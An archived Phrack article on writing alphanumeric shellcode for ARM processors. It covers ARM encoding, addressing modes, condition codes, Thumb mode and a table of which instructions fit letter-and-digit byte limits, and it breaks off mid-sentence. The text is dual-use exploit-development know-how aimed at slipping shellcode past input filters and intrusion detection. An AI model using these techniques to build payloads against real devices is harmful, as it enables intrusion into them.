💾 Archived View for aphrack.org › issues › phrack66 › 12.gmi captured on 2021-12-04 at 18:04:22. Gemini links have been rewritten to link to archived content
⬅️ Previous capture (2021-12-03)
-=-=-=-=-=-=-
|=-------------------------------------------------------------------=| |=-----------------=[ Alphanumeric RISC ARM Shellcode ]=-------------=| |=-------------------------------------------------------------------=| |=-------------------------------------------------------------------=| |=--=[ Yves Younan (yyounan@fort-knox.org) / ace (ace@nologin.org]=--=| |=----------=[ Pieter Philippaerts (pieter@mentalis.org) ]=----------=| |=-------------------------------------------------------------------=| 0.- Introduction 1.- The ARM architecture 1.0 - The ARM Processor 1.1 - Coprocessors 1.2 - Addressing Modes 1.3 - Conditional Execution 1.4 - Example Instructions 1.5 - The Thumb Instruction Set 2.- Alphanumeric shellcode 2.0 - Alphanumeric bit patterns 2.1 - Addressing modes 2.2 - Conditional Execution 2.3 - The Instruction List 2.4 - Getting a known value in a register 2.5 - Writing to R0-R2 2.6 - Self-modifying Code 2.7 - The Instruction Cache 2.8 - Going to Thumb Mode 2.9 - Going to ARM mode 3.- Conclusion 4.- Acknowledgements 5.- References A.- Shellcode Appendix A.0 - Writable Memory A.1 - Example Shellcode A.2 - Resulting Bytes --[ 0.- Introduction With the sudden explosion of mobile devices, the ARM processor has become one of the most widespread CPU cores in the world. ARM processors offer a good trade-off between power usage and processing power, which makes it an excellent candidate for mobile and embedded devices. Most mobile phones and personal digital assistants feature an ARM processor. Only recently, however, these devices have become powerful enough to let users connect over the internet to various services, and to share information like we are used to on desktop PCs. Unfortunately, this introduces a number of security risks. Like PCs, native ARM applications are susceptible to attacks such as buffer overflows and other improper input validation abuse. Since up till recently only fully featured desktop computers were powerful enough to connect to the internet and disseminate information in a ubiquitous manner, most attacks have focussed on the dominant desktop processor, which is the x86 processor. Given the increased connectivity of ARM-based devices, and given the potential for misuse of these devices (for instance, by making a hacked phone call commercial numbers), attacks on these devices will become much more common than is now the case. A typical hurdle for exploit writers, is that the shellcode has to pass one or more filtering methods before reaching the vulnerable buffer. A filtering method is a method that does some simple input validation, for instance by stringently checking that input matches a particular predefined pattern. A popular regular expression for example is [a-zA-Z0-9] (possibly extended with "space"). Intrusion detection systems are also adding more checks to detect particular patterns of op codes to detect attacks against applications. For educational purposes, we describe in this article how to write alphanumeric shellcode for ARM. This is important, because alphanumeric strings typically pass more of these validation checks and tend to survive more data transformations (such as conversions from one encoding to another) than non-alphanumeric shellcode. Writing alphanumeric shellcode was not considered easily doable on RISC architectures, which use 4 byte instructions. When we discuss the bits in a byte we will use the following representation: the most significant bit is bit 7 and the least significant bit is bit 0 in our discussion. The first byte of an instruction is bit 31 to 24 and the last byte is bit 7 to 0. --[ 1.- The ARM architecture ----[ 1.0 The ARM Processor The ARM architecture is a 32-bit RISC architecture with 16 general purpose registers available to regular programs and a status register (actually there are more general purpose registers and status registers but those are only used in exception modes and not important for our discussion). Every instruction is 4 bytes long so we must ensure that all 4 of these bytes are alphanumeric. This is very different from the x86 architecture which has variable length instructions. As a result, getting instructions to be completely alphanumeric is harder on ARM than on x86. Registers R0 to R12 are real general purpose registers that do not have a dedicated purpose. Register R13 is used as a stack pointer and can also be referred to as register SP. Register R14 is used as the link register and is also referred to as LR. It contains the return address for functions and exceptions. Register R15 contains the current program counter and is also referred to as PC. Unlike x86 architectures, we can directly read and write this register. Reading from this register will return the currently executing instruction + 8 bytes in ARM mode or the current instruction + 4 bytes in Thumb mode (see section 1.5). Writing to this register causes execution to continue at this address. A[31:0] _________ /\ _________ | _____ | ALE || ABE |_____ | | | || | || | || | | | | \/ V || V \/ |i| | | +--------------------+ |n| | | | Address Register | |c| | | +--------------------+ |r| | | ^ || |e| | | / \ || |m| | | |P| \/ |e| | | |C| +-----------+ |n| | |____ | | | Address |__|t| | ____ | |b| |Incrementer|__ e| +-----------+ | | || |u| +-----------+ |r| | Scan | | | \/ |s| | | | Control | | | +---------------------+ |b| +-----------+ | | | Register Bank | |u| +-----------+<- DBGRQI | | |(31x32-bit registers)| |s| | |<- BREAKPTI | | | (6 status registers)|<----+ | |-> DBGACK | | +---------------------+ | |-> ECLK |A| | | | | |-> nEXEC |L| | | | ___ | |<- ISYNC |U| | | +-------->| | | |<- BL[3:0] | | | | +----------+ |B| | |<- APE |b| | | | 32x8 | | | | |<- MCLK |u| |A|<=>|Multiplier|<=>|b| | |<- nWAIT |s| | | +----------+ |u| | |-> nRW | | |b| ___________|s| |Instruction|-> MAS[1:0] | | |u| | _________ | | Decoder |<- nIRQ | | |s| || | | | & |<- nFIQ | | | | \/ | | | Control |<- nRESET | | | | +-------+ | | | Logic |<- ABORT | | | | |Barrel | | | | |-> nTRANS | | | | |Shifter| | | | |-> nMREQ | | | | +-------+ | | | |-> nOPC | | \ / || | | | |-> SEQ | | v \/ | | | |-> LOCK | | ------------ | | | |-> nCPI | | \32-bit ALU/ | | | |<- CPA | | ---------- | | | |<- CPB | |__________|| | | | |-> nM[4:0] |_____________| | | | |<- TBE _____________________| | | |-> TBIT |______________________| +-----------+-> HIGHZ || /\ /\ \/ || || +-------------------+ +---------------------------+ |Write Data Register| | Instruction pipeline | +-------------------+ | & Read Data Register | | ^ ^ || |& Thumb Instruction Decoder| v | | || +---------------------------+ nENOUT|nENIN || /\ | ||____________________|| DBE |______________________| || \/ D[31:0] There are many versions of the ARM processor, with version 6 adding a large amount of new instructions. In this paper we try to remain as broad as possible: our alphanumeric ARM shellcode should work on all versions of the ARM processor. To this end, we will drop all instructions that require a specific version of a processor. However, we clearly note which instructions are dropped because they are not alphanumeric and which instructions are dropped because of compatibility constraints. This allows a shellcode writer who only needs compatibility with a specific processor version to take advantage of the extra instructions that may be available in that processor. ----[ 1.1 Coprocessors ARM processors can be extended with a number of coprocessors to perform non-standard calculations and to avoid having to do these calculations in software. ARM supports up to 16 coprocessors, each of which has a unique identification number. Some processors might need more than one identification number, in order to accommodate large instruction sets. Coprocessors are available for memory management, floating point operations, debugging, media, cryptography, ... When an ARM processor encounters an instruction it cannot process, it sends the instruction out on the coprocessor bus. If a coprocessor recognizes the instruction, it can execute it and respond to the main processor. If none of the coprocessors respond, an 'illegal instruction' exception is raised. ----[ 1.2 Addressing Modes ARM has different addressing modes. We'll briefly discuss the different addressing modes which are useful for writing our shellcode. ----[ 1.2.0 Addressing modes for data processing Most instructions will look like this: <opcode>{<cond>}{S} <Rd>, <Rn>, <shifter_operand> For example: ADDEQ r0, r1, #20 The shifter_operand is the third argument to an instruction. It is 12 bits large and can be one of the following 11 possibilities. When a <shift_imm> is specified below, this is an immediate that is 4 bits large, meaning that it can be any value in the range of 0 to 31. 1. #immediate An immediate of 8 bits can be used as shifter operand. The 8 bits immediate can optionally be rotated right by a shift_imm. 2. <Rm> A register can be used as an argument. 3. <Rm>, LSL #<shift_imm> A register, which is logically shifted left a shift_imm. 4. <Rm>, LSL <Rs> A register Rm is used as argument that is shifted left by a second register Rs. 5. <Rm>, LSR #<shift_imm> A register, which is logically shifted right by a shift_imm. 6. <Rm>, LSR <Rs> A register Rm is used as argument that is shifted right by a second register Rs. 7. <Rm>, ASR #<shift_imm> A register, which is arithmetically shifted right by a shift_imm. 8. <Rm>, ASR <Rs> A register, which is arithmetically shifted right by a register. 9. <Rm>, ROR #<shift_imm> A register, which is rotated right by a shift_imm. 10. <Rm>, ROR <Rs> A register, which is rotated right by a register. 11. <Rm>, RRX A register which is rotated right by one bit, with the carry flag replacing the free bit. The carry flag is then replaced with the bit which was rotated out. ----[ 1.2.1 Addressing modes for load/store word or unsigned byte This is the general syntax for a load or store instruction: LDR{<cond>}{B}{T} <Rd>, addressing_mode For example: LDRPLB r3, [r3, #-48] Where addressing_mode is one of the following 6 possibilities. For the loads and stores with translation (e.g. LDRBT), only the last 3 addressing modes are possible. If an exclamation mark is specified at the end of the first 3 addressing modes (e.g. for addressing mode 1, [<Rn>, #+/-<imm_12>]!), then the calculated address is written back to Rn. 1. [<Rn>, #+/-<imm_12>]<!> Rn is the base address of the memory location where Rd will be stored. Optionally a 12 bit immediate can be used as offset. This offset is then added to the base address to calculate the address to write to. 2. [<Rn>, +/-<Rm]<!> Rn is the base address of the memory location where Rd will be stored and Rm will be used as offset for Rn. 3. [<Rn>, +/-<Rm>, <shift> #<shift_imm>]<!> Rn is the base address, with Rm as offset. The Rm register is shifted by applying the <shift> operation with a <shift_imm> as argument. <shift> is one of LSL, LSR, ASR, ROR or RRX. The following three addressing modes are essentially the same as the above 3 addressing modes, except that they are post-indexed. That means that Rn is used as the memory location for the load or store. The calculation is done afterwards and written back into Rn. 4. [<Rn>], #+/-<imm_12> 5. [<Rn>], +/-<Rm> 6. [<Rn>], +/-<Rm>, <shift> #<shift_imm> ----[ 1.2.2 Addressing modes for load/store multiple The general instruction syntax for multiple loads and stores looks like this: LDM{<cond>}<addressing_mode> <Rn>{!}, <registers>{^} For example: LDMPLFA r5!, {r0, r1, r2, r6, r8, lr} Addressing modes are one of the following 4 possibilities: 1. IA - Increment after In this addressing mode, Rn will be used as a base address and the first memory location to read or write from. The subsequent addresses will be calculated by incrementing the previous address with 4. 2. IB - Increment before In this addressing mode, Rn will be used as the base address. The first memory location to read or write from is the base address + 4. Subsequent addresses will also be calculated by incrementing the previous address with 4. 3. DA - Decrement after Rn is used as the base address, from that register, the amount of registers multiplied by 4 is subtracted from this base address. Then 4 is added to this address. This is used as the first memory location to read or write from. Subsequent addresses are calculated by incrementing the previous address with 4. 4. DB - Decrement before Rn is used as the base address, from that register, the amount of registers multiplied by 4 is subtracted from this base address. This is used as the first memory location to read or write from. Subsequent addresses are calculated by incrementing the previous address with 4. ----[ 1.3 Conditional Execution One of the features of the ARM processor is that it supports conditional execution of instructions. This means that the programmer can choose whether instructions will be executed or not, depending on the value of one of the different status flags. This has practical use to write, for instance, short if structures in a more compact manner. Almost all ARM instructions support conditional execution. The conditional execution of an instruction is represented by adding a suffix to the name of the instruction that denotes in which circumstances it will be executed. Without this suffix, the instruction will always be executed. As a short example, consider the following C fragment: if (err != 0) printf("An error has occurred! Errorcode = %i\n", err); else printf("Everything is ok!\n"); GCC compiles the above code to: cmp r1, #0 beq .L4 ldr r0, .L9 bl printf b .L8 .L4: ldr r0, .L9+4 bl puts .L8: With conditional execution, it could be rewritten as: cmp r1, #0 ldrne r0, .L9 blne printf ldreq r0, .L9+4 bleq puts The 'ne' suffix means that the instruction will only be executed if the contents of, in this case, R1 is not equal to 0. Similarly, the 'eq' suffix means that the instructions will be executed if the contents of R1 is equal to 0. ----[ 1.4 Example Instructions ARM instructions are grouped into a number of categories, and each category has a similar bit layout. For illustration purposes, we will list and discuss some of these groups here. This list is not meant to be exhaustive or complete. The first group of instructions are called 'data processing instructions'. This group covers a broad range of operations, which includes basic arithmetic and bitwise operations. Data processing instructions can be called with two registers as operands, or with a register and an immediate value. An example of each of these options is show below. 31 28 27 26 25 24 21 20 19 16 15 12 11 7 6 5 4 3 0 +-----+--+--+--+------+--+-----+-----+------------+-----+-+---+ |cond | 0| 0| 0|opcode| S| Rn | Rd |shift amount|shift|0| Rm| +-----+--+--+--+------+--+-----+-----+------------+-----+-+---+ Example: SUBPL r6, pc, r5, ror #2 0101 0 0 0 0010 0 1111 0110 00010 11 0 0101 31 28 27 26 25 24 21 20 19 16 15 12 11 8 7 0 +------+--+--+--+------+--+------+------+------+--------------+ | cond | 0| 0| 1|opcode| S| Rn | Rd |rotate| immediate | +------+--+--+--+------+--+------+------+------+--------------+ Example: SUBPL r3, r1, #56 0101 0 0 1 0010 0 0001 0011 0000 00111000 A second set of important instructions, are the instructions used to load bytes from the memory into registers, and to store the result of calculations back into the memory. In our shellcode, we will typically call them with an immediate offset as operand. 31 28 27 26 25 24 23 22 21 20 19 16 15 12 11 0 +-----+--+--+--+--+--+--+--+--+------+------+-------------+ |cond | 0| 1| 0| P| U| W| B| L| Rn | Rd | immediate | +-----+--+--+--+--+--+--+--+--+------+------+-------------+ Example: LDRMIB r3, [pc, #-48] 0100 0 1 0 1 0 1 0 1 1111 0011 000000110000 An interesting alternative to loading and storing registers one at a time, is to use the 'load/store multiple' instructions. The instructions in this group all load or store multiple registers at once. Bits 15 to 0 hold which registers will be operated on. 31 28 27 26 25 24 23 22 21 20 19 16 15 0 +-----+--+--+--+--+--+--+--+--+------+---------------+ |cond | 1| 0| 0| P| U| S| W| L| Rn | register list | +-----+--+--+--+--+--+--+--+--+------+---------------+ Example: STMMIFD r5, {r0, r3, r4, r6, r8, lr}^ 0100 1 0 0 1 0 1 0 0 0101 0100000101011001 The groups described in this section are only a small subset of the different instruction categories. However, these four groups are the most important ones in the context of this article. ----[ 1.5 The Thumb Instruction Set Thumb mode is a mode in which the ARM processor can be set by changing the T bit of the CPSR register to 1. In this mode, the processor will use 16 bit instructions, which allows for better code density. Only T variants of the ARM processor support this mode (e.g. ARM4T), however as of ARMv6 Thumb support is mandatory. Instructions executed in 32 bit mode are called ARM instructions, while instructions executed in 16 bit mode are called Thumb instructions. Since instructions are only 2 bytes large in Thumb mode, it is easier to satisfy the alphanumeric constraints for instructions. To this end, we discuss how to get into Thumb mode from ARM mode in our shellcode. While our shellcode can run with only ARM instructions, writing code in Thumb mode is more convenient and smaller, resulting in less instructions and more compact shellcode. For programs already running in Thumb mode, we discuss a way of going back to ARM mode. Unlike ARM instructions, Thumb instructions do not support conditional execution. Given the fact that we can easily switch from ARM to Thumb and back and that ARM mode can do everything that we need, even if no Thumb mode is available, we achieve the broadest possible compatibility in our shellcode. --[ 2.- Alphanumeric shellcode ----[ 2.0 Alphanumeric bit patterns A common problem for exploit writers is that their shellcode has to survive one or more byte transformations, before triggering the actual buffer overflow. These transformations could for instance be text encoding conversions, but could also be related to parsing or input validation. In most cases, alphanumeric bytes are likely to get through unmodified. Therefore, having shellcode with only alphanumeric instructions is sometimes necessary and often preferred. An alphanumeric instruction is an instruction where each of the four bytes of the instruction is either an upper or lower case letter, or a number. In particular, the bit patterns of these bytes must always conform to the following constraints: - Bit 7 must be set to 0 - Bit 6 or 5 must be set to 1 - If bit 5 is set, but bit 6 isn't, then bit 4 must also be set These constraints do not eliminate all non-alphanumeric characters, but they can be used as a rule of thumb to quickly dismiss most of the invalid bytes. Each instruction will have to be checked whether its bit pattern follows these conditions and under which circumstances. A potential problem for exploit writers is to get the return address to also be alphanumeric. This is not further discussed in this article as it strongly depends from situation to situation. ----[ 2.1 Addressing modes In this section we will describe which addressing modes we can use that will ensure that our shellcode is alphanumeric. ----[ 2.1.0 Addressing modes for data processing 1. #immediate 11 8 7 0 +--------+---------------------+ | rotate | imm_8 | +--------+---------------------+ Since we can fully control the value of imm_8, we can ensure that it is alphanumeric. 2. <Rm> 11 10 9 8 7 6 5 4 3 0 +--+--+--+--+--+--+--+--+-------+ | 0| 0| 0| 0| 0| 0| 0| 0| Rm | +--+--+--+--+--+--+--+--+-------+ Since bits 6 and 5 are both 0, this type of addressing mode can not be used in alphanumeric shellcode. 3. <Rm>, LSL #<shift_imm> 11 7 6 5 4 3 0 +-----------+--+--+--+--------+ | shift_imm | 0| 0| 0| Rm | +-----------+--+--+--+--------+ As in addressing mode 2, bits 6 and 5 are 0, so it can not be represented alphanumerically. 4. <Rm>, LSL <Rs> 11 8 7 6 5 4 3 0 +-----------+--+--+--+--------+ | Rs | 0| 0| 0| 1| Rm | +-----------+--+--+--+--------+ Again, bits 6 and 5 are 0, so this addressing mode can not be used. 5. <Rm>, LSR #<shift_imm> 11 7 6 5 4 3 0 +-----------+--+--+--+--------+ | shift_imm | 0| 1| 0| Rm | +-----------+--+--+--+--------+ Since bit 6 is 0, bits 5 and 4 must both be one. Only bit 5 is one, we can not represent this addressing mode alphanumerically. 6. <Rm>, LSR <Rs> 11 8 7 6 5 4 3 0 +-----------+--+--+--+--------+ | Rs | 0| 0| 1| 1| Rm | +-----------+--+--+--+--------+ Bit 6 is 0, but since bits 5 and 4 are both set to 1, we can use this addressing mode in our alphanumeric shellcode. Register Rm must be less than R10. 7. <Rm>, ASR #<shift_imm> 11 7 6 5 4 3 0 +-----------+--+--+--+--------+ | shift_imm | 1| 0| 0| Rm | +-----------+--+--+--+--------+ Since bit 6 is set to 1, the only restriction on this addressing mode is that Rm can not be R0. 8. <Rm>, ASR <Rs> 11 8 7 6 5 4 3 0 +-----------+--+--+--+--------+ | Rs | 0| 1| 0| 1| Rm | +-----------+--+--+--+--------+ This bit pattern is alphanumeric and allows any register to be used as Rm. 9. <Rm>, ROR #<shift_imm> 11 7 6 5 4 3 0 +-----------+--+--+--+--------+ | shift_imm | 1| 1| 0| Rm | +-----------+--+--+--+--------+ Like addressing mode 8, this pattern is alphanumeric and any register can be used as Rm. 10. <Rm>, ROR <Rs> 11 8 7 6 5 4 3 0 +-----------+--+--+--+--------+ | Rs | 0| 1| 1| 1| Rm | +-----------+--+--+--+--------+ Since bits 6, 5 and 4 are set to 1, Rm must be smaller than R11. 11. <Rm>, RRX 11 10 9 8 7 6 5 4 3 0 +--+--+--+--+--+--+--+--+-------+ | 0| 0| 0| 0| 0| 1| 1| 0| Rm | +--+--+--+--+--+--+--+--+-------+ This bit pattern is alphanumeric and any register can be used as Rm. ----[ 2.1.1 Addressing modes for load/store word or unsigned byte 1. [<Rn>, #+/-<imm_12>]<!> 11 0 +------------------------------+ | imm_12 | +------------------------------+ Since we can fully control the value of imm_12, we can ensure that it is alphanumeric. 2. [<Rn>, +/-<Rm>]<!> 11 10 9 8 7 6 5 4 3 0 +--+--+--+--+--+--+--+--+-------+ | 0| 0| 0| 0| 0| 0| 0| 0| Rm | +--+--+--+--+--+--+--+--+-------+ This addressing mode can not be represented alphanumerically. 3. [<Rn>, +/-<Rm>, <shift> #<shift_imm>]<!> 11 7 6 5 4 3 0 +-----------+-----+--+--------+ | shift_imm |shift| 0| Rm | +-----------+-----+--+--------+ - If shift is LSL, then bits 6 and 5 are 0. This is not alphanumeric. - If shift is LSR, then bit 6 is 0 and bit 5 is 1. But since bit 4 stays 0, it is not alphanumeric. - If shift is ASR, then bit 6 is 1 and bit 5 is 0. This means that it is alphanumeric as long as Rm is not R0. - If shift is ROR or RRX, then bits 6 and 5 will be 1, which is alphanumeric, regardless of the register used as Rm. The other post-indexing addressing modes discussed above have essentially the same bit layout for the last 12 bytes. They only differ in that these modes will unset bit 24 in the load or store instruction. ----[ 2.1.2 Addressing modes for load/store multiple The increment addressing modes will set bit 23 in the load or store instruction, while the decrement modes will unset bit 23. If bit 23 is set, then the instruction can not be represented alphanumerically. So only the decrement addressing mode can be used in alphanumeric shellcode. ----[ 2.2 Conditional Execution Because the condition code of an instruction is encoded in the most significant bits of the fourth byte of the instruction (bits 31-28), the value of the condition code has a direct impact on the alphanumeric properties of the instruction. As a result, only a limited set of condition codes can be used in alphanumeric shellcode. The table below lists all the condition codes and their corresponding bit pattern: [bitpattern] [name] [description] 0000 EQ Equal 0001 NE Not equal 0010 CS/HS Carry set/unsigned higher or same 0011 CC/LO Carry clear/unsigned lower 0100 MI Minus/negative 0101 PL Plus/positive or zero 0110 VS Overflow 0111 VC No overflow 1000 HI Unsigned higher 1001 LS Unsigned lower or same 1010 GE Signed greater than or equal 1011 LT Signed less than 1100 GT Signed greater than 1101 LE Signed less than or equal 1110 AL Always (unconditional) - 1111 (used for other purposes) _| |_ | | bit31 bit28 Remember that the most significant bit of a byte should always be set to 0 in order to be alphanumeric, so this excludes the last eight condition codes. In addition, the resulting byte must be at least 0x30, so this excludes the first three condition codes too. Unfortunately, 'AL' is one of the codes that cannot be used in alphanumeric shellcode. This means that all ARM instructions must be executed conditionally. In this article, we choose PL and MI as the two condition codes that we will use. They are mutually exclusive, so we can always ensure that an instruction gets executed by simply adding the same instruction twice to the shellcode, once with the PL suffix and once with the MI suffix. ----[ 2.3 The Instruction List In our list of instructions, we make a distinction between SZ/SO (should be zero/should be one) and IZ/IO (is zero/is one). We do this because the ARM reference manual specifies that specific bits must be set to 0 or 1 and others "should be" set to 0 or 1 (defined as SBZ or SBO in the manual). However, on our test processor if we set a bit marked as "should be" to something else, the processor throws an undefined instruction exception. As such, we've considered should be and must be to be equivalent for our discussion, but we note the difference should this behavior be different in other processors (since this would allow us to use many more instructions). The table below lists all the instructions present in ARMv6. For each instruction, we've checked some simple constraints that may not be broken in order for the instruction to be alphanumeric. The main focus of this table is the high order bits of the second byte of the instruction (bits 23 to 20). The reason that only the high order bits of this byte are included, is because the high order bits of the first byte are set by the condition flags, and the high order bits of the third and fourth byte are often set by the operands of the instruction. When the table contains the value 'd' for a bit, it means that the value of this bit depends on specific settings. The final column contains a list of things that disqualify the instruction for being used in alphanumeric shellcode. Disqualification criteria are that at least one of the four bytes of the instruction is either always too high to be alphanumeric, or too low. In this column, the following conventions are used: - 'IO' is used to indicate that one or more bits is always 1 - 'IZ' is used to indicate that one or more bits is always 0 - 'SO' is used to indicate that one or more bits should be 1 - 'SZ' is used to indicate that one or more bits should be 0 +-----------+--------+--+--+--+--+---------------------------+ |instruction|version |23|22|21|20|disqualifiers | +-----------+--------+--+--+--+--+---------------------------+ |ADC | |1 |0 |1 |d |IO: 23 | |ADD | |1 |0 |0 |d |IO: 23 | |AND | |0 |0 |0 |d |IZ: 23-21 | |B, BL | |d |d |d |d | | |BIC | |1 |1 |0 |d |IO: 23 | |BKPT |5+ |0 |0 |1 |0 |IO: 31, IZ: 22, 20 | |BLX (1) |5+ |d |d |d |d |IO: 31 | |BLX (2) |5+ |0 |0 |1 |0 |SO: 15, IZ: 22, 20 | |BX |4T, 5+ |0 |0 |1 |0 |IO: 7, SO: 15, IZ 22, 20 | |BXJ |5TEJ, 6+|0 |0 |1 |0 |SO: 15, IZ: 22, 20, 6, 4 | |CDP | |d |d |d |d | | |CLZ |5+ |0 |1 |1 |0 |IZ: 7-5 | |CMN | |0 |1 |1 |1 |SZ: 15-13 | |CMP | |0 |1 |0 |1 |SZ: 15-13 | |CPS |6+ |0 |0 |0 |0 |SZ: 15-13, IZ 22-20 | |CPY |6+ |1 |0 |1 |0 |IZ: 22, 20, 7-5, IO 23 | |EOR | |0 |0 |1 |d | | |LDC | |d |d |d |1 | | |LDM (1) | |d |0 |d |1 | | |LDM (2) | |d |1 |0 |1 | | |LDM (3) | |d |1 |d |1 |IO: 15 | |LDR | |d |0 |d |1 | | |LDRB | |d |1 |d |1 | | |LDRBT | |0 |1 |1 |1 | | |LDRD |5TE+ |d |d |d |0 | | |LDREX |6+ |1 |0 |0 |1 |IO: 23, 7 | |LDRH | |d |d |d |1 |IO: 7 | |LDRSB |4+ |d |d |d |1 |IO: 7 | |LDRSH |4+ |d |d |d |1 |IO: 7 | |LDRT | |d |0 |1 |1 | | |MCR | |d |d |d |0 | | |MCRR |5TE+ |0 |1 |0 |0 | | |MLA | |0 |0 |1 |d |IO: 7 | |MOV | |1 |0 |1 |d |IO: 23 | |MRC | |d |d |d |1 | | |MRRC |5TE+ |0 |1 |0 |1 | | |MRS | |0 |d |0 |0 |SZ: 7-0 | |MSR | |0 |d |1 |0 |SO: 15 | |MUL | |0 |0 |0 |d |IO: 7 | |MVN | |1 |1 |1 |d |IO: 23 | |ORR | |1 |0 |0 |d |IO: 23 | |PKHBT |6+ |1 |0 |0 |0 |IO: 23 | |PKHTB |6+ |1 |0 |0 |0 |IO: 23 | |PLD |5TE+, |d |1 |0 |1 |IO: 15 | | |!5TExP | | | | | | |QADD |5TE+ |0 |0 |0 |0 |IZ: 22-21 | |QADD16 |6+ |0 |0 |1 |0 |IZ: 22, 20 | |QADD8 |6+ |0 |0 |1 |0 |IZ: 22, 20, IO: 7 | |QADDSUBX |6+ |0 |0 |1 |0 |IZ: 22, 20 | |QDADD |5TE+ |0 |1 |0 |0 | | |QDSUB |5TE+ |0 |1 |1 |0 | | |QSUB |5TE+ |0 |0 |1 |0 |IZ: 22, 20 | |QSUB16 |6+ |0 |0 |1 |0 |IZ: 22, 20 | |QSUB8 |6+ |0 |0 |1 |0 |IZ: 22, 20, IO: 7 | |QSUBADDX |6+ |0 |0 |1 |0 |IZ: 22, 20 | |REV |6+ |1 |0 |1 |1 |IO: 23 | |REV16 |6+ |1 |0 |1 |1 |IO: 23, 7 | |REVSH |6+ |1 |1 |1 |1 |IO: 23, 7 | |RFE |6+ |d |0 |d |1 |SZ: 14-13, 6-5 | |RSB | |0 |1 |1 |d | | |RSC | |1 |1 |1 |d |IO: 23 | |SADD16 |6+ |0 |0 |0 |1 |IZ: 22-21 | |SADD8 |6+ |0 |0 |0 |1 |IZ: 22-21, IO: 7 | |SADDSUBX |6+ |0 |0 |0 |1 |IZ: 22-21 | |SBC | |1 |1 |0 |d |IO: 23 | |SEL |6+ |1 |0 |0 |0 |IO: 23 | |SETEND |6+ |0 |0 |0 |0 |SZ: 14-13, IZ: 22-21, 6-5 | |SHADD16 |6+ |0 |0 |1 |1 |IZ: 6-5 | |SHADD8 |6+ |0 |0 |1 |1 |IO: 7 | |SHADDSUBX |6+ |0 |0 |1 |1 | | |SHSUB16 |6+ |0 |0 |1 |1 | | |SHSUB8 |6+ |0 |0 |1 |1 |IO: 7 | |SHSUBADDX |6+ |0 |0 |1 |1 | | |SMLA<x><y> |5TE+ |0 |0 |0 |0 |IO: 7, IZ: 22-21 | |SMLAD |6+ |0 |0 |0 |0 |IZ: 22-21 | |SMLAL | |1 |1 |1 |d |IO: 23,7 | |SMLAL<x><y>|5TE+ |0 |1 |0 |0 |IO: 7 | |SMLALD |6+ |0 |1 |0 |0 | | |SMLAW<y> |5TE+ |0 |0 |1 |0 |IZ: 22, 20, IO: 7 | |SMLSD |6+ |0 |0 |0 |0 |IZ: 22-21 | |SMLSLD |6+ |0 |1 |0 |0 | | |SMMLA |6+ |0 |1 |0 |1 | | |SMMLS |6+ |0 |1 |0 |1 |IO: 7 | |SMMUL |6+ |0 |1 |0 |1 |IO: 15 | |SMUAD |6+ |0 |0 |0 |0 |IZ: 22-21, IO: 15 | |SMUL<x><y> |5TE+ |0 |1 |1 |0 |SZ: 15, IO: 7 | |SMULL | |1 |1 |0 |d |IO: 23 | |SMULW<x><y>|5TE+ |0 |0 |1 |0 |IZ: 22, 20,SZ: 14-13, IO: 7| |SMUSD |6+ |0 |0 |0 |0 |IZ: 22-21, IO: 15 | |SRS |6+ |d |1 |d |0 |SZ: 14-13, 6-5 | |SSAT |6+ |1 |0 |1 |d |IO: 23 | |SSAT16 |6+ |1 |0 |1 |0 |IO: 23 | |SSUB16 |6+ |0 |0 |0 |1 |IZ: 22-21 | |SSUB8 |6+ |0 |0 |0 |1 |IZ: 22-21, IO: 7 | |SSUBADDX |6+ |0 |0 |0 |1 |IZ: 22-21 | |STC |2+ |d |d |d |0 | | |STM (1) | |d |0 |d |0 |IZ: 22, 20 | |STM (2) | |d |1 |0 |0 | | |STR | |d |0 |d |0 |IZ: 22, 20 | |STRB | |d |1 |d |0 | | |STRBT | |d |1 |1 |0 | | |STRD |5TE+ |d |d |d |0 |IO: 7 | |STREX |6+ |1 |0 |0 |0 |IO: 7 | |STRH |4+ |d |d |d |0 |IO: 7 | |STRT | |d |0 |1 |0 |IZ: 22, 20 | |SUB | |0 |1 |0 |d | | |SWI | |d |d |d |d | | |SWP |2a, 3+ |0 |0 |0 |0 |IZ: 22-21, IO: 7 | |SWPB |2a, 3+ |0 |1 |0 |0 |IO: 7 | |SXTAB |6+ |1 |0 |1 |0 |IO: 23 | |SXTAB16 |6+ |1 |0 |0 |0 |IO: 23 | |SXTAH |6+ |1 |0 |1 |1 |IO: 23 | |SXTB |6+ |1 |0 |1 |0 |IO: 23 | |SXTB16 |6+ |1 |0 |0 |0 |IO: 23 | |SXTH |6+ |1 |0 |1 |1 |IO: 23 | |TEQ | |0 |0 |1 |1 |SZ: 14-13 | |TST | |0 |0 |0 |1 |IZ: 22-21, SZ: 14-13 | |UADD16 |6+ |0 |1 |0 |1 |IZ: 6-5 | |UADD8 |6+ |0 |1 |0 |1 |IO: 7 | |UADDSUBX |6+ |0 |1 |0 |1 | | |UHADD16 |6+ |0 |1 |1 |1 |IZ: 6-5 | |UHADD8 |6+ |0 |1 |1 |1 |IO: 7 | |UHADDSUBX |6+ |0 |1 |1 |1 | | |UHSUB16 |6+ |0 |1 |1 |1 | | |UHSUB8 |6+ |0 |1 |1 |1 |IO: 7 | |UHSUBADDX |6+ |0 |1 |1 |1 | | |UMAAL |6+ |0 |1 |0 |0 |IO: 7 | |UMLAL | |1 |0 |1 |d |IO: 23, 7 | |UMULL | |1 |0 |0 |d |IO: 23, 7 | |UQADD16 |6+ |0 |1 |1 |0 |IZ: 6-5 | |UQADD8 |6+ |0 |1 |1 |0 |IO: 7 | |UQADDSUBX |6+ |0 |1 |1 |0 | | |UQSUB16 |6+ |0 |1 |1 |0 | | |UQSUB8 |6+ |0 |1 |1 |0 |IO: 7 | |UQSUBADDX |6+ |0 |1 |1 |0 | | |USAD8 |6+ |1 |0 |0 |0 |IO: 23, 15, IZ: 6-5 | |USADA8 |6+ |1 |0 |0 |0 |IO: 23, IZ: 6-5 | |USAT |6+ |1 |1 |1 |d |IO: 23 | |USAT16 |6+ |1 |1 |1 |0 |IO: 23 | |USUB16 |6+ |0 |1 |0 |1 | | |USUB8 |6+ |0 |1 |0 |1 |IO: 7 | |USUBADDX |6+ |0 |1 |0 |1 | | |UXTAB |6+ |1 |1 |1 |0 |IO: 23 | |UXTAB16 |6+ |1 |1 |0 |0 |IO: 23 | |UXTAH |6+ |1 |1 |1 |1 |IO: 23 | |UXTB |6+ |1 |1 |1 |0 |IO: 23 | |UXTB16 |6+ |1 |1 |0 |0 |IO: 23 | |UXTH |6+ |1 |1 |1 |1 |IO: 23 | +-----------+--------+--+--+--+--+---------------------------+ From the list of 147 instructions that are present in the latest revision of the ARM documentation, we will now remove all instructions that require a specific ARM architecture version and all the 